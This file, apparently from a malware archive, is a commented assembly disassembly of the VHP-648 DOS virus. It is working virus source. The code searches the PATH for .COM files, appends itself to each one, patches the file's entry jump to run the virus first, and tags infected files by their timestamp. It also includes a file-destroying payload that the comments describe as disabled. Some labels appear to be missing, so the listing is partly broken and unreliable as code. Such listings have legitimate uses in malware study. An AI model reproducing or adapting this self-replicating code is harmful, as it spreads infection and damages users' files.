vxunderground 4b9382ddbc re-organize
2022-08-21 04:07:57 -05:00

331 lines
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This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify equ $-2 ;The instruction above is changed
; before each contamination
mov si,dx
add si,saveins-data ;Instruction saved there
mov di,offset start
mov cx,3 ;Move 3 bytes
rep movsb ;Do it
mov si,dx ;Keep SI pointed at data
mov ah,30 ;Get DOS version
int 21
cmp al,0 ;Less than 2.0?
jne skip1
jmp exit ;Exit if so
push es ;Save ES
mov ah,2F ;Get current DTA in ES:BX
int 21
mov word ptr [si+0],bx ;dtaadr
mov word ptr [si+2],es
pop es ;Restore ES
mov dx,mydta-data
add dx,si
mov ah,1A ;Set DTA
int 21
push es ;Save ES & SI
push si
mov es,ds:[environ] ;Environment address
mov di,0
n_00015A: ;Search 'PATH=' in the environment
pop si ;Restore data offset in SI
push si
add si,pathstr-data
mov cx,8000 ;Maximum 32K in environment
repne scasb ;Search for first letter ('P')
mov cx,4 ;4 letters in 'PATH'
lodsb ;Search for next char
jne n_00015A ;If not found, search for next 'P'
loop n_000169 ;Loop until done
pop si ;Restore SI & ES
pop es
mov [si+16],di ;Save 'PATH' offset in poffs
mov di,si
add di,fname-data ;Point SI & DI at '=' sign
mov bx,si ;Point BX at data area
add si,fname-data
mov di,si
jmp short n_0001BF
cmp word ptr [si+16],6C ;poffs
jne n_00018F
jmp olddta
push ds
push si
mov ds,es:[environ]
mov di,si
mov si,es:[di+16] ;poffs
add di,fname-data
cmp al,';'
je n_0001B0
cmp al,0
je n_0001AD
jmp n_0001A1
mov si,0
pop bx
pop ds
mov [bx+16],si ;poffs
cmp byte ptr [di-1],'\'
je n_0001BF
mov al,'\' ;Add '\' if not already present
mov [bx+18],di ;Save '=' offset in eqoffs
mov si,bx ;Restore data pointer in SI
add si,allcom-data
mov cx,6 ;6 bytes in ASCIIZ '*.COM'
rep movsb ;Move '*.COM' at fname
mov si,bx ;Restore SI
mov ah,4E ;Find first file
mov dx,fname-data
add dx,si
mov cx,11b ;Hidden, Read/Only or Normal files
int 21
jmp short n_0001E3
mov ah,4F ;Find next file
int 21
jnc n_0001E7 ;If found, try to contaminate it
jmp n_000185 ;Otherwise search in another directory
mov ax,[si+75] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
cmp [si+79],64000d ;Is file size greather than 64,000 bytes?
ja findnext ;If so, search for next file
cmp word ptr [si+79],10d ;Is file size less than 10 bytes?
jb findnext ;If so, search for next file
mov di,[si+18] ;eqoffs
push si ;Save SI
add si,namez-data ;Point SI at namez
cmp al,0
jne n_000209
pop si ;Restore SI
mov ax,4300 ;Get file attributes
mov dx,fname-data
add dx,si
int 21
mov [si+8],cx ;Save them in fattrib
mov ax,4301 ;Set file attributes
;The next `db's are there because MASM can't assemble
; the instruction `and cx,0FFFE' correctly (the fool!):
db 081,0E1,0FE,0FF
; and cx,not 1 ;Turn off Read Only flag
mov dx,fname-data
add dx,si
int 21
mov ax,3D02 ;Open file with Read/Write access
mov dx,fname-data
add dx,si
int 21
jnc n_00023E
jmp oldattr ;Exit on error
mov bx,ax ;Save file handle in BX
mov ax,5700 ;Get file date & time
int 21
mov [si+4],cx ;Save time in ftime
mov [si+6],dx ;Save date in fdate
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
;If so, destroy file (don't contaminate). Now this code is disabled.
jmp short n_000266 ;CHANGED. Was jnz here
;Destroy file by rewriting an illegal jmp as first instruction:
mov ah,40 ;Write to file handle
mov cx,5 ;Write 5 bytes
mov dx,si
add dx,bad_jmp-data ;Write THESE bytes
int 21 ;Do it
jmp short oldtime ;Exit
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
mov dx,saveins-data ;Put them there
add dx,si
int 21
jc oldtime ;Exit on error
cmp ax,3 ;Are really 3 bytes read?
jne oldtime ;Exit if not
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
mov cx,0 ;0 bytes from end
mov dx,0
int 21
jc oldtime ;Exit on error
mov cx,ax ;Get the value of file pointer
sub ax,3 ;Subtract 3 from it to get real code size
mov [si+14d],ax ;Save result in filloc
add cx,data-(virus-100)
mov di,si
sub di,data-modify ;A little self-modification
mov [di],cx
mov ah,40 ;Write to file handle
mov cx,enddata-virus ;Virus code length as bytes to be written
mov dx,si
sub dx,data-virus ;Now DX points at virus label
int 21
jc oldtime ;Exit on error
cmp ax,enddata-virus ;Are all bytes written?
jne oldtime ;Exit if not
mov ax,4200 ;LSEEK from the beginning of the file
mov cx,0 ;Just at the file beginning
mov dx,0
int 21
jc oldtime ;Exit on error
;Rewrite the first instruction of the file with a jump to the virus code:
mov ah,40 ;Write to file handle
mov cx,3 ;3 bytes to write
mov dx,si
add dx,newjmp-data ;Write THESE bytes
int 21
mov dx,[si+6] ;Restore file date
mov cx,[si+4] ; and time
;And these again are due to the MASM 5.0 foolness:
db 081,0E1,0E0,0FF
db 081,0C9,01F,000
; and cx,not 11111b
; or cx,11111b ;Set seconds to 62 (?!)
mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21
mov ax,4301 ;Set file attributes
mov cx,[si+8] ;They were saved in fattrib
mov dx,fname-data
add dx,si
int 21
push ds ;Save DS
mov ah,1A ;Set DTA
mov dx,[si+0] ;Restore saved DTA
mov ds,[si+2]
int 21
pop ds ;Restore DS
pop cx ;Restore CX
xor ax,ax ;Clear registers
xor bx,bx
xor dx,dx
xor si,si
mov di,100 ;Jump to CS:100
push di ; by doing funny RET
xor di,di
ret -1
data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 0EBh,0Fh,90 ;Original first 3 bytes
newjmp db 0E9 ;Code of jmp instruction
filloc dw ? ;File pointer is saved here
allcom db '*.COM',0 ;Filespec to search for
poffs dw ? ;Address of 'PATH' string
eqoffs dw ? ;Address of '=' sign
pathstr db 'PATH='
fname db 40 dup (' ') ;Path name to search for
;Disk Transfer Address for Find First / Find Next:
mydta label byte
drive db ? ;Drive to search for
pattern db 13d dup (?) ;Search pattern
reserve db 7 dup (?) ;Not used
attrib db ? ;File attribute
time dw ? ;File time
date dw ? ;File date
fsize dd ? ;File size
namez db 13d dup (?) ;File name found
;This replaces the first instruction of a destroyed file:
bad_jmp db 0EA,0Bh,2,13,58
enddata label byte
code ends
end start